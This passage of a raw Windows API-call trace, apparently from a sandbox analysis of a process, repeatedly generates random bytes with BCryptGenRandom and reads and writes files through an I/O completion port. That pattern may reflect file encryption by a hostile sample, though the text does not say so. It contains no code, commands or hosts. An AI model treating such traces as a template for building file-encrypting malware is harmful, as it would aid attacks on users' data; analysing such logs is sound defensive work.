0x77d7a8 [0121.902] free (_Block=0x1fa91d0) [0121.902] free (_Block=0x77d7a8) [0121.902] free (_Block=0x1fa90b8) [0121.902] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.983] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.984] CloseHandle (hObject=0x2f4) returned 1 [0121.984] free (_Block=0x3df0008) [0121.985] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0122.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0122.002] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.002] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.002] free (_Block=0x3e305b8) [0122.002] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.002] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.002] free (_Block=0x1fa91d0) [0122.002] free (_Block=0x77d7a8) [0122.002] free (_Block=0x1fa90b8) [0122.002] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.003] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x27d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.368] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5ee4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.468] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2232, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.488] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe392, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.515] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9114, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.517] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.543] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1846, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.545] CloseHandle (hObject=0x2f4) returned 1 [0122.546] free (_Block=0x3df0008) [0122.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0122.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0122.558] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.558] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.558] free (_Block=0x3e305b8) [0122.558] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.558] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.558] free (_Block=0x1fa91d0) [0122.558] free (_Block=0x77d7a8) [0122.558] free (_Block=0x1fa90b8) [0122.558] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.569] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.570] CloseHandle (hObject=0x2f4) returned 1 [0122.571] free (_Block=0x3df0008) [0122.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0122.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0122.611] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.611] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.611] free (_Block=0x3e305b8) [0122.611] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.611] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.612] free (_Block=0x1fa91d0) [0122.612] free (_Block=0x77d7a8) [0122.612] free (_Block=0x1fa90b8) [0122.612] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.612] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.713] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x150a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.894] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe16, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0122.894] CloseHandle (hObject=0x2f4) returned 1 [0122.894] free (_Block=0x3df0008) [0122.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0123.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0123.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0123.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0123.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0123.720] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0123.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0123.720] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0123.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0123.720] free (_Block=0x3e305b8) [0123.721] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0123.721] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0123.721] free (_Block=0x1fa91d0) [0123.721] free (_Block=0x77d7a8) [0123.721] free (_Block=0x1fa90b8) [0123.721] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0123.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0123.948] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x23d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0123.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0123.949] CloseHandle (hObject=0x2f4) returned 1 [0123.949] free (_Block=0x3df0008) [0123.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0124.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0124.034] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.034] free (_Block=0x3e305b8) [0124.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.034] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.034] free (_Block=0x1fa91d0) [0124.034] free (_Block=0x77d7a8) [0124.034] free (_Block=0x1fa90b8) [0124.034] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.035] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.045] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.046] CloseHandle (hObject=0x2f4) returned 1 [0124.046] free (_Block=0x3df0008) [0124.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0124.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0124.100] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.100] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.100] free (_Block=0x3e305b8) [0124.100] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.101] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.101] free (_Block=0x1fa91d0) [0124.101] free (_Block=0x77d7a8) [0124.101] free (_Block=0x1fa90b8) [0124.101] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.101] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.105] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.150] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1352, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0124.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0124.159] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.160] free (_Block=0x3e305b8) [0124.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.160] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.160] free (_Block=0x1fa91d0) [0124.160] free (_Block=0x77d7a8) [0124.160] free (_Block=0x1fa90b8) [0124.160] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.178] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xcd2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0124.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.189] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4162, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0124.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.205] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2378, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0124.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.238] CloseHandle (hObject=0x308) returned 1 [0124.238] free (_Block=0x3df0008) [0124.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.246] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0124.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0124.247] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.247] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.247] free (_Block=0x3e305b8) [0124.247] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.247] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.247] free (_Block=0x1fa91d0) [0124.247] free 